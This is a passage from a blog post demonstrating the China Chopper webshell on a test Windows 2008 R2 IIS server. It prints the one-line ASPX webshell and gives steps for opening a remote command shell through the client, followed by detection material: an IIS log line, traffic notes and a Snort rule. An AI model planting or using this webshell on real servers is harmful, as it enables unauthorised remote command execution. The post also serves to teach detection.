<span style="font-family: Verdana, sans-serif;"><a href="http://4.bp.blogspot.com/-dqS4CC4PMYw/UKa7Brw2mRI/AAAAAAAAEUo/yj2UAFgkn9c/s1600/CCOpened.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="http://4.bp.blogspot.com/-dqS4CC4PMYw/UKa7Brw2mRI/AAAAAAAAEUo/yj2UAFgkn9c/s320/CCOpened.tiff" width="320" /></a></span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif; font-size: x-small;">You will see examples already listed referencing maicaidao.com. Lets add in the information to communicate with our test compromised Windows 2008 R2 server using the webshell.aspx file mentioned above.</span></div>
<div>
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif; font-size: x-small;">Right-click and select add, you will see the following dialog box</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana, sans-serif;"><a href="http://2.bp.blogspot.com/-RjGVJ6CJP0I/UKa8RaiEOkI/AAAAAAAAEUw/OhWDXyErtLM/s1600/CCconfig.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="161" src="http://2.bp.blogspot.com/-RjGVJ6CJP0I/UKa8RaiEOkI/AAAAAAAAEUw/OhWDXyErtLM/s320/CCconfig.tiff" width="320" /></a></span></div>
<div>
<span style="font-family: Verdana, sans-serif; font-size: x-small;">Address field is the URL to the file on the compromised server. The next field acts as a password of sort, if this doesn't match the contents in the webshell.aspx file it won't work.</span></div>
<div>
<div style="text-align: center;">
<span style="font-family: Verdana, sans-serif;"><span style="font-size: x-small;"><%@ Page Language="Jscript"%><%eval(Request.Item[”<b>password</b>"],"unsafe");%></span></span></div>
<div style="text-align: center;">
<span style="font-family: Verdana, sans-serif;"><span style="font-size: x-small;"><br /></span></span></div>
<div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; font-size: x-small;">Change the file type to match ASPX and change the codepage to UTF-8. </span></div>
<div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; font-size: x-small;">Click 'Edit' to save your changes. To open up a remote shell, right-click on the entry and select 'Virtual Terminal'. If everything was correctly you will see the following command interface.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana, sans-serif;"><a href="http://4.bp.blogspot.com/-XssN0vGvG-c/UKa-1Fy9sPI/AAAAAAAAEVA/65t6WsrLr6U/s1600/Untitled.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="http://4.bp.blogspot.com/-XssN0vGvG-c/UKa-1Fy9sPI/AAAAAAAAEVA/65t6WsrLr6U/s320/Untitled.tiff" width="320" /></a></span></div>
<div style="text-align: left;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;"><span style="font-size: x-small;">I should note that this works on a fully patched and default configuration of Windows 2008 R2 web server role. Primarily because .NET by default has full control, if you change it to 'High' China Chopper (and many other) webshell will not work.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana, sans-serif;"><a href="http://2.bp.blogspot.com/-L0Dk1D-xnqs/UKa_6btcVyI/AAAAAAAAEVI/2bB2EHfv3AM/s1600/IIS+NET+Trust+Levels.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="198" src="http://2.bp.blogspot.com/-L0Dk1D-xnqs/UKa_6btcVyI/AAAAAAAAEVI/2bB2EHfv3AM/s320/IIS+NET+Trust+Levels.tiff" width="320" /></a></span></div>
<div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;"><span style="font-size: x-small;">When the webshell is executing commands you will see the following with Process Explorer</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana, sans-serif;"><a href="http://1.bp.blogspot.com/-2qrdXYlsZrw/UKbAZuyjQLI/AAAAAAAAEVQ/ZUQWdSA-RrE/s1600/procExp.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="40" src="http://1.bp.blogspot.com/-2qrdXYlsZrw/UKbAZuyjQLI/AAAAAAAAEVQ/ZUQWdSA-RrE/s640/procExp.tiff" width="640" /></a></span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><span style="font-size: x-small;"><br /></span></span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><span style="font-size: x-small;">IIS logs will show only a post to the file, here is a line copied from the IIS log</span></span></div>
<div>
<div style="text-align: left;">
<span style="font-family: Verdana, sans-serif;"><span style="font-size: xx-small;">2012-11-16 22:30:14 172.16.192.137 POST /webshell.aspx - 80 - 172.16.192.140 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) 200 0 0 31</span></span></div>
<div style="font-size: small;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div style="font-size: small;">
<span style="font-family: Verdana, sans-serif;">The traffic is base64 encoded, here is a snipit from Wireshark during a post of the initial connection and sending the netstat command.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-xjKIBYXWObk/UKbB8wBqtRI/AAAAAAAAEVY/5ajCLOi_joU/s1600/wires.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="http://3.bp.blogspot.com/-xjKIBYXWObk/UKbB8wBqtRI/AAAAAAAAEVY/5ajCLOi_joU/s400/wires.tiff" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif; font-size: x-small;">There are many ways to protect against this so I won't go into that, however it would be a good idea to do some Splunking on http posts! If you don't have Splunk you could use snort to monitor for this with a simple rule to watch for base64_decode and POST.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif; font-size: x-small;">I put this together really quick as a proof of concept so no consideration was put into performance. Snort might already have much better rules in place to detect base64 in http traffic.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif; font-size: xx-small;">alert tcp any any -> any 80 ( sid:900001; content:"base64_decode"; http_client_body;flow:to_server,established; content:"POST"; nocase;http_method; ;msg:"Webshell Detected Apache";)</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
<span style="font-family: Verdana, sans-serif; font-size: x-small;">I hope this post has informative and helped you out. If you have any questions, please feel free to contact me.</span></div>
<div>
<span style="font-family: Verdana, sans-serif; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif; font-size: x-small;">Keith</span></div>
<br />
<span style="font-family: Verdana, sans-serif;"><br /></span>Unknownnoreply@blogger.com